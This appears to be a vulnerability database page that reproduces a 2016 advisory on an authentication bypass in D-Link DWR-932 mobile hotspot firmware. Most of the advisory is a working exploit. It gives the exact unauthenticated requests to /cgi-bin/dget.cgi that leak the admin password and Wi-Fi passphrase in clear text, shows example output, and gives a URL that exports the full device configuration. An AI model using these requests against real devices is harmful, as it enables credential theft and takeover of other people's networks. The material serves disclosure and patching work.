Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

D-Link DWR-932 Authentication Bypass / Password Disclosure

🗓️ 21 Mar 2016 00:00:00Reported by Saeed reza ZamanianType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

D-Link DWR-932 Firmware V4.00 Authentication Bypass - Password Disclosur

Code
`D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure  
  
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]  
  
Product: D-Link DWR-932   
Tested Version: Firmware V4.00(EU)b03  
Vendor: D-Link http://www.dlink.com/  
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps  
Date: 20 Mar 2016  
  
  
About Product:   
---------------  
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.  
  
  
Vulnerability Details:  
----------------------  
The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.  
so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.  
  
View Admin Username and Password:  
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807  
Output:  
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }  
  
View Wifi Password:  
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703  
Output:  
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }  
  
Export All Configurations:  
http://192.168.0.1/cgi-bin/export_cfg.cgi  
  
  
#EOF  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Mar 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
d-link dwr-932firmware v4.00authentication bypasspassword disclosure4g ltewi-fi hotspotvulnerabilitycgi scriptsecurity flaw
40